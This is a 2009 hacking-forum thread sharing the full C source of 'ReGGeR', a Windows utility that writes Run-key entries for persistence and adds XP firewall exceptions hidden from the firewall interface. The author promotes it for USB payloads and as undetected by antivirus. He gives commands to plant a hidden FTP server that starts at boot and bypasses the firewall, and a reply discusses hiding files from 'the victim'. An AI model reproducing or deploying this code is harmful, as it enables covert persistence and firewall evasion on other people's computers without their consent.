sablefoxx Posted May 13, 2009 Posted May 13, 2009 ReGGeR v1.0 About: Basically this is my first attempt to write a (somewhat) useful app all in C/C++ that accepts command line arguments, so if the codes a little sloppy that's why. Basically what this program does is, given a file (such as C:\file.exe) it will add the file (via registry key) to start up with the system, or (if in XP) will add the file to the firewall exception list (very useful for USB payloads).Features: - Easily add startup regkeys (XP/Vista/Win7). - Easily add firewall regkeys (XP Only). - Firewall keys are automatically hidden from the firewall GUI. - This program writes directly to the registry so you can add keys even if Regedit is disabled by the admin (assuming you still have write access to the dir). - Can also create .reg files - 0% Virus Detection Rate Examples: Small file size makes it perfect for USB payloads (why i'm posting it here). For example if you wanted to have a hidden FTP server start everytime the computer turned on, and bypass the filewall all you'd need to do is;copy .\hidec.exe C:\ copy .\ftpdmin.exe C:\ regger.exe -xpfw C:\ftpdmin.exe ftp regger.exe -startup "C:\hidec.exe ftpdmin.exe" ftpexec Notes: - If system is running Vista, and has UAC enabled you need to run the program with admin rights - If you find any bugs, or suggestions for new features please post them!Download:ReGGeR v1.0 - 5/12/09Dev-C++ (Used to Compile)Source ( .c file included in download above ):/************************************************************* Name: ReGGeR Copyright: Fuck that shit Author: SableFoXx Description: Easily add firewall and startup regkeys Version: 1.0 **************************************************************/ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <windows.h> #define FN_MAX 255 /* Max file name length, ntfs is 255 */ #define N_STARTUP "Software\\Microsoft\\Windows\\CurrentVersion\\Run" #define N_XPFW "System\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile\\AuthorizedApplications\\List" void error(int); int main(int argc, char * argv[]) { void xpfw(char* argv[]); void strtup(char* argv[]); void make_file(char* argv[], int fn); int filexist(char* argv[]); if(argc < 4 || 5 < argc) /* Check for correct number of args */ { if(argc != 2) { error(1); return 0; } } if(strcmp(argv[1], "/?") == 0 || strcmp(argv[1], "-help") == 0 || strcmp(argv[1], "/help") == 0) { error(0); return 0; } if(argc > 4) if((strcmp(argv[4], "-mk")) == 0) { int fn; if((strcmp(argv[1], "-startup")) == 0) fn = 1; else fn = 0; make_file(argv, fn); return 0; } else { error(2); return 0; } if((strcmp(argv[1], "-xpfw")) == 0) { FILE *xp; if ((xp = fopen("C:\\WINDOWS\\System32\\wupdmgr.exe", "r")) == NULL ) { error(4); /* Non-XP System */ return 0; } filexist(argv); xpfw(argv); } else { if((strcmp(argv[1], "-startup")) == 0) { filexist(argv); strtup(argv); } else error(2); } return 0; } void xpfw(char* argv[]) { HKEY hKey; char path[FN_MAX]; char name[FN_MAX]; strcpy(path, argv[2]); strcpy(name, argv[2]); strcat(path, ":*:enabled:@xpsp2res.dll,-22019"); //hide from gui if(RegOpenKeyEx(HKEY_LOCAL_MACHINE, N_XPFW, 0, KEY_SET_VALUE, &hKey) == ERROR_SUCCESS) { RegSetValueEx(hKey, name, 0, REG_SZ, (const unsigned char*)path, sizeof(path)); RegCloseKey(hKey); } else error(3); } void strtup(char* argv[]) { HKEY hKey; char path[FN_MAX]; char name[FN_MAX]; strcpy(path, argv[2]); strcpy(name, argv[3]); if(RegOpenKeyEx(HKEY_LOCAL_MACHINE, N_STARTUP, 0, KEY_SET_VALUE, &hKey) != ERROR_SUCCESS) error(3); else { RegSetValueEx(hKey, name, 0, REG_SZ, (const unsigned char*)path, sizeof(path)); RegCloseKey(hKey); } } int filexist(char* argv[]) { FILE *find; if ((find = fopen(argv[2], "r")) == NULL) { printf("\nWARNING: File does not exist, continuing..."); return 1; } else { fclose(find); return 0; } } void make_file(char* argv[], int fn) { void print_path(char path[], int fn); FILE *out; char path[FN_MAX]; strcpy(path, argv[2]); if(fn == 1) /* Header */ { out = fopen("startup.reg", "w"); fprintf(out, "Windows Registry Editor Version 5.00\n\n[HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run]\n"); fprintf(out, "\"%s\"=\"", argv[3]); fclose(out); print_path(path, 1); out = fopen("startup.reg", "a"); fprintf(out, "\""); /* Suffix */ } else { out = fopen("xpfw.reg", "w"); fprintf(out, "Windows Registry Editor Version 5.00\n\n[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile\\AuthorizedApplications\\List]\n\""); fclose(out); print_path(path, 0); /* Name must be same as path for firewall keys */ out = fopen("xpfw.reg", "a"); fprintf(out, "\"=\""); /* Quick Write "=" */ fclose(out); print_path(path, 0); out = fopen("xpfw.reg", "a"); fprintf(out, ":*:Enabled:@xpsp2res.dll,-22019\""); /* Suffix */ } fclose(out); } void print_path(char path[], int fn) { FILE *out; if(fn == 1) out = fopen("startup.reg", "a"); else out = fopen("xpfw.reg", "a"); int cnt = 0; int max_index = strlen(path) - 1; while(cnt <= max_index) /* Print Path */ { if(path[cnt] != 92) /* 92 is ascii for '\' */ fprintf(out, "%c", path[cnt]); else fprintf(out, "\\\\"); cnt++; } fclose(out); } void error(int err) /* Error Codes */ { switch(err) { case 1 : printf("\nUSER ERROR: Wrong number of arguments\n"); break; case 2 : printf("\nUSER ERROR: Mode does not exist\n"); break; case 3 : printf("\nPERMISSIONS ERROR: Unable to open parent registry key"); break; case 4 : printf("\nUSER ERROR: Non-Windows XP operating system in use\n"); break; default: /* Display Usage*/ printf("\n * Version 1.0, By SableFoXx *\n"); printf("\n Regger.exe [mode] [file] [name] [make]"); printf("\n [mode] -startup Add startup key (XP/Vista/Win7)"); printf("\n -xpfw Add firewall exception key (XP Only)"); printf("\n -help View this message"); printf("\n [file] C:\\path\\to\\file.exe"); printf("\n [name] Name of registry key being created"); printf("\n [make] -mk Create a .reg file (Optional)"); } } Quote
LizardKing Posted May 22, 2009 Posted May 22, 2009 Nice piece of code, have to check it out! I needed something like these so I could modify the registry keys so that the victim is not able to display hidden files in folders :D I'll try it and let you know how it works! Quote
sablefoxx Posted May 23, 2009 Author Posted May 23, 2009 Nice piece of code, have to check it out! I needed something like these so I could modify the registry keys so that the victim is not able to display hidden files in folders :D I'll try it and let you know how it works! not a bad idea, i may have to add that. been thinking about other regkeys i can through in Quote
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.